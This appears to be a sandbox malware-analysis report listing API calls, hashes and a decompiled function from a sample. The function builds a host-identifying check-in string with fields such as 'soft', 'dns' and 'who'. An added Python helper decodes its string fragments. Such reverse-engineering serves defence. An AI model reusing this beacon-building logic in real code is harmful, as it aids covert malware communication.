                                          • Instruction ID: e128386774df80de8d9c2c35fd72247174c47e2c859047119413eff392114942
                                          • Opcode Fuzzy Hash: a6b0af2f6c4c83abb9dfe23dfa048024f9ebc4e543184c6859b22096e726aaf0
                                          • Instruction Fuzzy Hash: C6F19471408345AFD710AF68DC85D6BBBE9FB84354F048A6DF5A9A31A0DB31DC84CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B69876
                                          • memcpy.NTDLL(?,?,00000010), ref: 00B69899
                                          • memset.NTDLL ref: 00B698E5
                                          • lstrcpyn.KERNEL32(?,?,00000034), ref: 00B698F9
                                          • GetLastError.KERNEL32 ref: 00B69927
                                          • GetLastError.KERNEL32 ref: 00B6996E
                                          • GetLastError.KERNEL32 ref: 00B6998D
                                          • WaitForSingleObject.KERNEL32(?,000927C0), ref: 00B699C7
                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B699D5
                                          • GetLastError.KERNEL32 ref: 00B69A4F
                                          • ReleaseMutex.KERNEL32(?), ref: 00B69A61
                                          • RtlExitUserThread.NTDLL(?), ref: 00B69A77
                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00B69AA0
                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00B69ABD
                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,00000010), ref: 00B69B0D
                                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000,00000010), ref: 00B69B17
                                          • GetLastError.KERNEL32 ref: 00B69B21
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B69B32
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000010), ref: 00B69B54
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B69B8B
                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00B69B9F
                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000010), ref: 00B69BA8
                                          • SuspendThread.KERNEL32(?), ref: 00B69BB7
                                          • CreateEventA.KERNEL32(00B79208,00000001,00000000), ref: 00B69BCB
                                          • SetEvent.KERNEL32(00000000), ref: 00B69BD8
                                          • CloseHandle.KERNEL32(00000000), ref: 00B69BDF
                                          • Sleep.KERNEL32(000001F4), ref: 00B69BF2
                                          • ResumeThread.KERNEL32(?), ref: 00B69C16
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$CloseFreeHeapObjectSingleThreadWait$CriticalEventHandleSection$CreateDeleteEnterExitFileLeaveMutexOpenReleaseResumeSleepSuspendUserlstrcpynmemcpymemset
                                          • String ID:
                                          • API String ID: 4191902400-0
                                          • Opcode ID: 7ca47df6e489cc1fea727c677c69504907e19196ed54bb66926bd9f0552d5553
                                          • Instruction ID: ce029b47717b25166371115f643b910434a07c5f777297bddcbcff7b8cff6ffb
                                          • Opcode Fuzzy Hash: 7ca47df6e489cc1fea727c677c69504907e19196ed54bb66926bd9f0552d5553
                                          • Instruction Fuzzy Hash: E2B18B72904305EFDB109FA4EC88A6ABBFDFB84311F044969F65AD31A0DB749984CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL ref: 00B5AAA5
                                          • GetTickCount.KERNEL32 ref: 00B5AABF
                                          • wsprintfA.USER32 ref: 00B5AB12
                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00B5AB1E
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00B5AB29
                                          • _aulldiv.NTDLL(?,?,?,?), ref: 00B5AB3F
                                          • wsprintfA.USER32 ref: 00B5AB55
                                          • wsprintfA.USER32 ref: 00B5AB7A
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5AB8D
                                          • wsprintfA.USER32 ref: 00B5ABB1
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5ABC4
                                          • wsprintfA.USER32 ref: 00B5ABFE
                                          • wsprintfA.USER32 ref: 00B5AC22
                                          • lstrcat.KERNEL32(?,?), ref: 00B5AC5A
                                            • Part of subcall function 00B6A670: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000,?,?,?,00B5D3E9,?,?), ref: 00B6A730
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00B5AC74
                                          • GetTickCount.KERNEL32 ref: 00B5AC84
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B5AC98
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B5ACB6
                                          • StrTrimA.SHLWAPI(00000000,00B743E8,00000000,0614C310), ref: 00B5ACEF
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B5AD11
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B5AD18
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B5AD1F
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B5AD26
                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 00B5ADA0
                                          • HeapFree.KERNEL32(00000000,?,00000000), ref: 00B5ADB2
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,0614C310), ref: 00B5ADC1
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5ADD3
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5ADE5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveObjectSingleTrimWait_aulldiv
                                          • String ID:
                                          • API String ID: 3322690043-0
                                          • Opcode ID: 49550cc2ce8cb396d0dbea0731ce6a906fd96ed6349612e72fb6e5c3318d7a33
                                          • Instruction ID: e5bf8f77694c2f600ca8afe3f92102d2d609e52f917180c46c22c7eadee3bb43
                                          • Opcode Fuzzy Hash: 49550cc2ce8cb396d0dbea0731ce6a906fd96ed6349612e72fb6e5c3318d7a33
                                          • Instruction Fuzzy Hash: F7A15A71104206AFDB019FA8EC88F5A3BF9FB48302F0549A5F91DD32A0DB31D899DB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,?,00B79190), ref: 00B6D0BB
                                          • RtlAllocateHeap.NTDLL(00000000,00B78AA9,?), ref: 00B6D157
                                          • lstrcpyn.KERNEL32(00000000,?,00B78AA9,?,00B79190), ref: 00B6D16C
                                          • HeapFree.KERNEL32(00000000,00000000,?,00B79190), ref: 00B6D187
                                          • StrChrA.SHLWAPI(?,00000020,00B78AA8,?,?,00B79190), ref: 00B6D26E
                                          • StrChrA.SHLWAPI(00000001,00000020,?,00B79190), ref: 00B6D27F
                                          • lstrlen.KERNEL32(00000000,?,00B79190), ref: 00B6D293
                                          • memmove.NTDLL(00B78AA9,?,00000001,?,00B79190), ref: 00B6D2A3
                                          • lstrlen.KERNEL32(?,00B78AA8,?,?,00B79190), ref: 00B6D2CF
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B6D2F5
                                          • memcpy.NTDLL(00000000,?,?,?,00B79190), ref: 00B6D309
                                          • memcpy.NTDLL(00B78AA8,?,?,?,00B79190), ref: 00B6D329
                                          • HeapFree.KERNEL32(00000000,00B78AA8,?,?,?,?,?,?,?,?,00B79190), ref: 00B6D365
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00B6D42B
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 00B6D473
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                          • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                          • API String ID: 3227826163-647159250
                                          • Opcode ID: 8db828a333d8e0b4f2ae11e3df860382d6d7a3482cfbcf0c9b34c301c2192d60
                                          • Instruction ID: f9152fe52464fef2a81321295cac7852bf554796637f472374574efa91c83f32
                                          • Opcode Fuzzy Hash: 8db828a333d8e0b4f2ae11e3df860382d6d7a3482cfbcf0c9b34c301c2192d60
                                          • Instruction Fuzzy Hash: FBE14771A00205AFDB15DFA8CC88BAE7BB9FF05300F1484A8E919AB261DB34ED51DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL ref: 00B5817E
                                          • wsprintfA.USER32 ref: 00B581E8
                                          • wsprintfA.USER32 ref: 00B5822E
                                          • wsprintfA.USER32 ref: 00B5824F
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B58286
                                          • wsprintfA.USER32 ref: 00B582A7
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B582C1
                                          • wsprintfA.USER32 ref: 00B582E8
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B582FD
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00B58317
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B58338
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B58352
                                            • Part of subcall function 00B5A1EA: lstrlen.KERNEL32(00000000,7477C740,?,00000000,76DC81D0,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A215
                                            • Part of subcall function 00B5A1EA: lstrlen.KERNEL32(?,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A21D
                                            • Part of subcall function 00B5A1EA: strcpy.NTDLL ref: 00B5A234
                                            • Part of subcall function 00B5A1EA: lstrcat.KERNEL32(00000000,?), ref: 00B5A23F
                                            • Part of subcall function 00B5A1EA: StrTrimA.SHLWAPI(00000000,=,00000000,?,?,00B5ACCC,00000000,0614C310), ref: 00B5A25C
                                          • StrTrimA.SHLWAPI(00000000,00B743E8,00000000,0614C310), ref: 00B58387
                                            • Part of subcall function 00B6E631: lstrlen.KERNEL32(06148560,00000000,00000000,76DC81D0,00B5ACFB,00000000), ref: 00B6E641
                                            • Part of subcall function 00B6E631: lstrlen.KERNEL32(?), ref: 00B6E649
                                            • Part of subcall function 00B6E631: lstrcpy.KERNEL32(00000000,06148560), ref: 00B6E65D
                                            • Part of subcall function 00B6E631: lstrcat.KERNEL32(00000000,?), ref: 00B6E668
                                          • lstrcpy.KERNEL32(?,?), ref: 00B583B0
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B583BA
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B583C5
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B583CC
                                          • RtlEnterCriticalSection.NTDLL(0614C2D0), ref: 00B583D7
                                          • RtlLeaveCriticalSection.NTDLL(0614C2D0), ref: 00B583F3
                                            • Part of subcall function 00B5FEA8: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,00B6F51A,00000000,00000000), ref: 00B5FEF9
                                            • Part of subcall function 00B5FEA8: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 00B5FF8C
                                          • HeapFree.KERNEL32(00000000,?,00000001,0614C310,?,?,?), ref: 00B584BA
                                          • HeapFree.KERNEL32(00000000,?,?), ref: 00B584D2
                                          • HeapFree.KERNEL32(00000000,?,00000000,0614C310), ref: 00B584E0
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B584EE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B584F9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                                          • String ID:
                                          • API String ID: 4032678529-0
                                          • Opcode ID: 18b5d30c42e577b9323684521910cb3ec154f88a6a4b6c31c9dfe1c98bc91fc3
                                          • Instruction ID: 684a03a750f60ef952fdf050711aa0f5b7d64856146bc0c648beef81141130bc
                                          • Opcode Fuzzy Hash: 18b5d30c42e577b9323684521910cb3ec154f88a6a4b6c31c9dfe1c98bc91fc3
                                          • Instruction Fuzzy Hash: 3AB17C31504206AFDB019FA8EC84F1A7BE9FB88311F0548A9F94DE72A0DF31D859CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E048959E2(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, void* _a20) {
                                          				signed int _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				intOrPtr _t66;
                                          				intOrPtr _t67;
                                          				intOrPtr _t68;
                                          				void* _t71;
                                          				intOrPtr _t72;
                                          				int _t75;
                                          				void* _t76;
                                          				void* _t77;
                                          				void* _t79;
                                          				void* _t82;
                                          				intOrPtr _t86;
                                          				intOrPtr _t90;
                                          				intOrPtr* _t92;
                                          				void* _t98;
                                          				intOrPtr _t104;
                                          				signed int _t108;
                                          				char** _t110;
                                          				int _t113;
                                          				intOrPtr* _t116;
                                          				intOrPtr* _t118;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t122;
                                          				intOrPtr _t125;
                                          				intOrPtr _t130;
                                          				int _t134;
                                          				intOrPtr _t136;
                                          				int _t139;
                                          				CHAR* _t140;
                                          				intOrPtr _t141;
                                          				void* _t142;
                                          				void* _t151;
                                          				int _t152;
                                          				void* _t153;
                                          				intOrPtr _t154;
                                          				void* _t156;
                                          				long _t160;
                                          				intOrPtr* _t161;
                                          				intOrPtr* _t162;
                                          				intOrPtr* _t165;
                                          				void* _t166;
                                          				void* _t168;
                                          
                                           				/* 048959e2 */ _t151 = __edx;
                                           				/* 048959e2 */ _t142 = __ecx;
                                           				/* 048959e2 */ _t63 = __eax;
                                           				/* 048959eb */ _v8 = 8;
                                           				/* 048959f4 */ if(__eax == 0) {
                                           				/* 048959f6 */ 	_t63 = GetTickCount(); // caller passed 0 in eax: the tick count becomes the last wsprintfA argument instead
                                           				/* 048959f6 */ }
                                           				/* 04895a03 */ _t64 =  *0x489a018; // 0x2682f32c
                                           				/* 04895a0e */ asm("bswap eax"); // each of the four dwords at 0x489a00c..0x489a018 is byte-swapped right after it is loaded
                                           				/* 04895a11 */ _t65 =  *0x489a014; // 0x3a87c8cd
                                           				/* 04895a16 */ _t140 = _a20;
                                           				/* 04895a1f */ asm("bswap eax");
                                           				/* 04895a22 */ _t66 =  *0x489a010; // 0xd8d2f808
                                           				/* 04895a27 */ asm("bswap eax");
                                           				/* 04895a2a */ _t67 =  *0x489a00c; // 0x8f8f86c2
                                           				/* 04895a2f */ asm("bswap eax");
                                           				/* 04895a32 */ _t68 =  *0x489a348; // 0x9ad5a8
                                           				/* 04895a3e */ _t3 = _t68 + 0x489b633; // 0x74666f73 = "soft" as little-endian ASCII: the first bytes of the format string
                                           				/* 04895a4b */ _t152 = wsprintfA(_t140, _t3, 3, 0x3d173, _t67, _t66, _t65, _t64,  *0x489a02c,  *0x489a004, _t63); // 0x3d173 = 250227; the four byte-swapped dwords follow it; _t63 is the caller's value or the tick count
                                           				/* 04895a4d */ _t71 = E04893F1E();
                                           				/* 04895a53 */ _t72 =  *0x489a348; // 0x9ad5a8
                                           				/* 04895a58 */ _t4 = _t72 + 0x489b673; // 0x74707526 = "&upt" as little-endian ASCII
                                           				/* 04895a63 */ _t75 = wsprintfA(_t152 + _t140, _t4, _t71); // appended right after what the first wsprintfA wrote
                                           				/* 04895a65 */ _t168 = _t166 + 0x38;
                                           				/* 04895a68 */ _t153 = _t152 + _t75;
                                           				/* 04895a6e */ if(_a8 != 0) {
                                           				/* 04895a70 */ 	_t136 =  *0x489a348; // 0x9ad5a8
                                           				/* 04895a78 */ 	_t8 = _t136 + 0x489b67e; // 0x732526 = "&%s" as little-endian ASCII
                                           				/* 04895a83 */ 	_t139 = wsprintfA(_t153 + _t140, _t8, _a8);
                                           				/* 04895a85 */ 	_t168 = _t168 + 0xc;
                                           				/* 04895a88 */ 	_t153 = _t153 + _t139;
                                           				/* 04895a88 */ }
                                           				/* 04895a8a */ _t76 = E04891567(_t142);
                                           				/* 04895a8f */ _t141 = __imp__;
                                           				/* 04895a95 */ _a8 = _t76;
                                           				/* 04895a9a */ if(_t76 != 0) {
                                           				/* 04895a9d */ 	_t130 =  *0x489a348; // 0x9ad5a8
                                           				/* 04895aa2 */ 	_t11 = _t130 + 0x489b8d4; // 0x736e6426 = "&dns" as little-endian ASCII
                                           				/* 04895aaf */ 	_t134 = wsprintfA(_a20 + _t153, _t11, _t76);
                                           				/* 04895ab1 */ 	_t168 = _t168 + 0xc;
                                           				/* 04895ab7 */ 	_t153 = _t153 + _t134;
                                           				/* 04895ac1 */ 	HeapFree( *0x489a2d8, 0, _a8); // the string returned by E04891567 is freed once it has been formatted in
                                           				/* 04895ac1 */ }
                                           				/* 04895ac3 */ _t77 = E04893268();
                                           				/* 04895ac8 */ _a8 = _t77;
                                           				/* 04895acd */ if(_t77 != 0) {
                                           				/* 04895ad0 */ 	_t125 =  *0x489a348; // 0x9ad5a8
                                           				/* 04895ad5 */ 	_t15 = _t125 + 0x489b8dc; // 0x6f687726 = "&who" as little-endian ASCII
                                           				/* 04895ae2 */ 	wsprintfA(_t153 + _a20, _t15, _t77);
                                           				/* 04895ae4 */ 	_t168 = _t168 + 0xc;
                                           				/* 04895af2 */ 	HeapFree( *0x489a2d8, 0, _a8);
                                           				/* 04895af2 */ }
                                           				/* 04895af4 */ _t154 =  *0x489a3cc; // 0x52495b0
                                           				/* 04895b02 */ _t79 = E04895D1C(0x489a00a, _t154 + 4);
                                           				/* 04895b07 */ _t160 = 0;
                                           				/* 04895b09 */ _v16 = _t79;
                                           				/* 04895b0e */ if(_t79 == 0) {
                                           				/* 04895ccf */ 	L28:
                                           				/* 04895cd9 */ 	HeapFree( *0x489a2d8, _t160, _a20); // common exit: the buffer passed in _a20 is always freed here
                                           				/* 04895ce2 */ 	return _v8;
                                           				/* 04895b14 */ } else {
                                           				/* 04895b20 */ 	_t82 = RtlAllocateHeap( *0x489a2d8, 0, 0x800);
                                           				/* 04895b26 */ 	_a8 = _t82;
                                           				/* 04895b2b */ 	if(_t82 == 0) {
                                           				/* 04895cc3 */ 		L27:
                                           				/* 04895ccd */ 		HeapFree( *0x489a2d8, _t160, _v16);
                                           				/* 00000000 */ 		goto L28;
                                           				/* 04895ccd */ 	}
                                           				/* 04895b37 */ 	E04893950(GetTickCount());
                                           				/* 04895b3c */ 	_t86 =  *0x489a3cc; // 0x52495b0
                                           				/* 04895b45 */ 	__imp__(_t86 + 0x40); // RtlEnterCriticalSection (API list below, ref 04895B45)
                                           				/* 04895b56 */ 	asm("lock xadd [eax], ecx"); // interlocked add; the decompiler did not recover the operands
                                           				/* 04895b5a */ 	_t90 =  *0x489a3cc; // 0x52495b0
                                           				/* 04895b63 */ 	__imp__(_t90 + 0x40); // RtlLeaveCriticalSection (API list below, ref 04895B63)
                                           				/* 04895b69 */ 	_t92 =  *0x489a3cc; // 0x52495b0
                                           				/* 04895b78 */ 	_t156 = E04893739(1, _t151, _a20,  *_t92);
                                           				/* 04895b7f */ 	_v24 = _t156;
                                           				/* 04895b88 */ 	asm("lock xadd [eax], ecx");
                                           				/* 04895b8e */ 	if(_t156 == 0) {
                                           				/* 04895cb7 */ 		L26:
                                           				/* 04895cc1 */ 		HeapFree( *0x489a2d8, _t160, _a8);
                                           				/* 00000000 */ 		goto L27;
                                           				/* 04895cc1 */ 	}
                                           				/* 04895b9a */ 	StrTrimA(_t156, 0x489928c);
                                           				/* 04895ba0 */ 	_push(_t156);
                                           				/* 04895ba1 */ 	_t98 = E04893970();
                                           				/* 04895ba6 */ 	_v12 = _t98;
                                           				/* 04895bab */ 	if(_t98 == 0) {
                                           				/* 04895cad */ 		L25:
                                           				/* 04895cb5 */ 		HeapFree( *0x489a2d8, _t160, _t156);
                                           				/* 00000000 */ 		goto L26;
                                           				/* 04895cb5 */ 	}
                                           				/* 04895bb4 */ 	_t161 = __imp__; // lstrcpy (API list below, refs 04895BBB and 04895BC3)
                                           				/* 04895bbb */ 	 *_t161(_t156, _a4);
                                           				/* 04895bc3 */ 	 *_t161(_a8, _v16);
                                           				/* 04895bc8 */ 	_t162 = __imp__; // lstrcat (API list below, refs 04895BD1 and 04895BD7)
                                           				/* 04895bd1 */ 	 *_t162(_a8, _v12);
                                           				/* 04895bdc */ 	_t104 = E04894208( *_t162(_a8, _t156), _a8); // _a8 now holds _v16, _v12 and _t156 concatenated
                                           				/* 04895be1 */ 	_a4 = _t104;
                                           				/* 04895be6 */ 	if(_t104 == 0) {
                                           				/* 04895ce5 */ 		_v8 = 8;
                                           				/* 04895c99 */ 		L23:
                                           				/* 04895c99 */ 		E04893F62();
                                           				/* 04895c9e */ 		L24:
                                           				/* 04895ca9 */ 		HeapFree( *0x489a2d8, 0, _v12);
                                           				/* 04895cab */ 		_t160 = 0;
                                           				/* 00000000 */ 		goto L25;
                                           				/* 04895cab */ 	}
                                           				/* 04895bf0 */ 	_t108 = E0489388D(_t141, 0xffffffffffffffff, _t156,  &_v20);
                                           				/* 04895bf5 */ 	_v8 = _t108;
                                           				/* 04895bfa */ 	if(_t108 == 0) {
                                           				/* 04895bff */ 		_t165 = _v20;
                                           				/* 04895c0f */ 		_v8 = E04893394(_t165, _a4, _a12, _a16);
                                           				/* 04895c12 */ 		_t116 =  *((intOrPtr*)(_t165 + 8));
                                           				/* 04895c18 */ 		 *((intOrPtr*)( *_t116 + 0x80))(_t116); // indirect call through the vtable entry at byte offset 0x80
                                           				/* 04895c1e */ 		_t118 =  *((intOrPtr*)(_t165 + 8));
                                           				/* 04895c24 */ 		 *((intOrPtr*)( *_t118 + 8))(_t118); // vtable offset 8 is IUnknown::Release if these are COM interfaces (E04893394 calls SysAllocString per the subcall list)
                                           				/* 04895c27 */ 		_t120 =  *((intOrPtr*)(_t165 + 4));
                                           				/* 04895c2d */ 		 *((intOrPtr*)( *_t120 + 8))(_t120);
                                           				/* 04895c30 */ 		_t122 =  *_t165;
                                           				/* 04895c35 */ 		 *((intOrPtr*)( *_t122 + 8))(_t122);
                                           				/* 04895c39 */ 		E04894C73(_t165);
                                           				/* 04895c39 */ 	}
                                           				/* 04895c45 */ 	if(_v8 != 0x10d2) {
                                           				/* 04895c51 */ 		L18:
                                           				/* 04895c55 */ 		if(_v8 == 0) {
                                           				/* 04895c57 */ 			_t110 = _a12;
                                           				/* 04895c5c */ 			if(_t110 != 0) {
                                           				/* 04895c5e */ 				_t157 =  *_t110;
                                           				/* 04895c63 */ 				_t163 =  *_a16;
                                           				/* 04895c68 */ 				wcstombs( *_t110,  *_t110,  *_a16); // in-place wide-to-ANSI conversion of the output buffer
                                           				/* 04895c75 */ 				_t113 = E048943A5(_t157, _t157, _t163 >> 1); // byte length halved to the character count
                                           				/* 04895c7d */ 				_t156 = _v24;
                                           				/* 04895c80 */ 				 *_a16 = _t113;
                                           				/* 04895c80 */ 			}
                                           				/* 04895c5c */ 		}
                                           				/* 00000000 */ 		goto L21;
                                           				/* 04895c47 */ 	} else {
                                           				/* 04895c4b */ 		if(_a12 != 0) {
                                           				/* 04895c82 */ 			L21:
                                           				/* 04895c85 */ 			E04894C73(_a4);
                                           				/* 04895c8e */ 			if(_v8 == 0 || _v8 == 0x10d2) {
                                           				/* 00000000 */ 				goto L24;
                                           				/* 00000000 */ 			} else {
                                           				/* 00000000 */ 				goto L23;
                                           				/* 00000000 */ 			}
                                           				/* 04895c8e */ 		}
                                           				/* 04895c4d */ 		_v8 = _v8 & 0x00000000; // status 0x10d2 with no output buffer requested (_a12 == 0) is reported as 0
                                           				/* 00000000 */ 		goto L18;
                                           				/* 04895c4d */ 	}
                                           				/* 04895c45 */ }
                                           			}
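The decompiler above prints the numeric value of each global and format-string pointer as a comment (for example `_t3 = _t68 + 0x489b633; // 0x74666f73`), and the four globals at 0x489a00c..0x489a018 are byte-swapped before they are handed to wsprintfA. The following Python is an added worked example, not part of the Joe Sandbox report and not code from the sample: it turns those dword comments back into the little-endian ASCII fragments they encode, mirrors BSWAP on the four globals, and scans decompiler text for further fragments. It assumes (the page does not show the full format string, only its "soft" prefix) that the four byte-swapped dwords are rendered with `%08x` each; the fragment names, the `LISTING_EXCERPT` input and the `min_len` threshold are mine.

```python
"""Decode the decompiler's dword comments from the E048959E2 listing.

Added example; not part of the sandbox report and not code from the sample.
"""
import re
import struct
from typing import Dict, List

# Immediates the decompiler printed next to the format-string pointers
# (values copied from the listing above).
FORMAT_FRAGMENTS: Dict[str, int] = {
    "0x489b633": 0x74666F73,
    "0x489b673": 0x74707526,
    "0x489b67e": 0x732526,
    "0x489b8d4": 0x736E6426,
    "0x489b8dc": 0x6F687726,
}

# Globals at 0x489a00c, 0x489a010, 0x489a014, 0x489a018 in the order their
# byte-swapped copies are passed to the first wsprintfA (values from the listing).
USER_DWORDS: List[int] = [0x8F8F86C2, 0xD8D2F808, 0x3A87C8CD, 0x2682F32C]

# Constructed excerpt of the listing, used as input for scan_listing().
LISTING_EXCERPT = """\
_t64 =  *0x489a018; // 0x2682f32c
_t3 = _t68 + 0x489b633; // 0x74666f73
_t4 = _t72 + 0x489b673; // 0x74707526
_t8 = _t136 + 0x489b67e; // 0x732526
_t11 = _t130 + 0x489b8d4; // 0x736e6426
_t15 = _t125 + 0x489b8dc; // 0x6f687726
_t154 =  *0x489a3cc; // 0x52495b0
"""

_COMMENT_RE = re.compile(r"//\s*0x([0-9a-fA-F]{1,8})\b")


def dword_to_ascii(value: int) -> str:
    """Return the bytes a 32-bit immediate occupies in memory as ASCII text.

    x86 is little-endian, so 0x74666f73 is stored as 73 6f 66 74 = "soft".
    Trailing NUL padding is dropped; anything non-printable raises ValueError.
    """
    raw = struct.pack("<I", value & 0xFFFFFFFF).rstrip(b"\x00")
    if not raw or not raw.isascii():
        raise ValueError(f"{value:#010x} is not an ASCII fragment")
    text = raw.decode("ascii")
    if not text.isprintable():
        raise ValueError(f"{value:#010x} is not printable")
    return text


def bswap32(value: int) -> int:
    """Mirror the x86 BSWAP instruction applied to a 32-bit register."""
    return struct.unpack("<I", struct.pack(">I", value & 0xFFFFFFFF))[0]


def decode_fragments(fragments: Dict[str, int] = FORMAT_FRAGMENTS) -> Dict[str, str]:
    """Map each format-string pointer offset to the ASCII fragment it points at."""
    return {offset: dword_to_ascii(v) for offset, v in fragments.items()}


def user_field(dwords: List[int] = USER_DWORDS) -> str:
    """Render the four byte-swapped globals as a %08x%08x%08x%08x conversion would.

    Assumption (not shown on the page): the format string prints each of the
    four dwords with %08x. Only the "soft" prefix of that string is recovered.
    """
    return "".join(f"{bswap32(d):08x}" for d in dwords)


def scan_listing(listing: str, min_len: int = 3) -> Dict[str, str]:
    """Find every '// 0x...' comment in decompiler output that decodes to printable ASCII.

    Pointers and counters (0x2682f32c, 0x52495b0, ...) contain non-ASCII bytes
    and are skipped; fragments shorter than min_len are ignored so that small
    counters are not mistaken for one- or two-character strings.
    """
    found: Dict[str, str] = {}
    for match in _COMMENT_RE.finditer(listing):
        literal = "0x" + match.group(1).lower()
        try:
            text = dword_to_ascii(int(match.group(1), 16))
        except ValueError:
            continue
        if len(text) >= min_len:
            found[literal] = text
    return found


if __name__ == "__main__":
    for offset, text in decode_fragments().items():
        print(f"{offset}: {text!r}")
    print("user=" + user_field())
    print(scan_listing(LISTING_EXCERPT))
```

The same helper applies to argument values in the API list: the `253D7325` passed to lstrlen inside E04893739 decodes to `%s=%`, the start of a key=value format string, which matches the `=` StrTrimA in that subcall.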

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 048959F6
                                          • wsprintfA.USER32 ref: 04895A46
                                          • wsprintfA.USER32 ref: 04895A63
                                          • wsprintfA.USER32 ref: 04895A83
                                          • wsprintfA.USER32 ref: 04895AAF
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04895AC1
                                          • wsprintfA.USER32 ref: 04895AE2
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04895AF2
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04895B20
                                          • GetTickCount.KERNEL32 ref: 04895B31
                                          • RtlEnterCriticalSection.NTDLL(05249570), ref: 04895B45
                                          • RtlLeaveCriticalSection.NTDLL(05249570), ref: 04895B63
                                            • Part of subcall function 04893739: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7477C740,?,?,0489653D,?,052495B0), ref: 04893764
                                            • Part of subcall function 04893739: lstrlen.KERNEL32(?,?,?,0489653D,?,052495B0), ref: 0489376C
                                            • Part of subcall function 04893739: strcpy.NTDLL ref: 04893783
                                            • Part of subcall function 04893739: lstrcat.KERNEL32(00000000,?), ref: 0489378E
                                            • Part of subcall function 04893739: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,0489653D,?,052495B0), ref: 048937AB
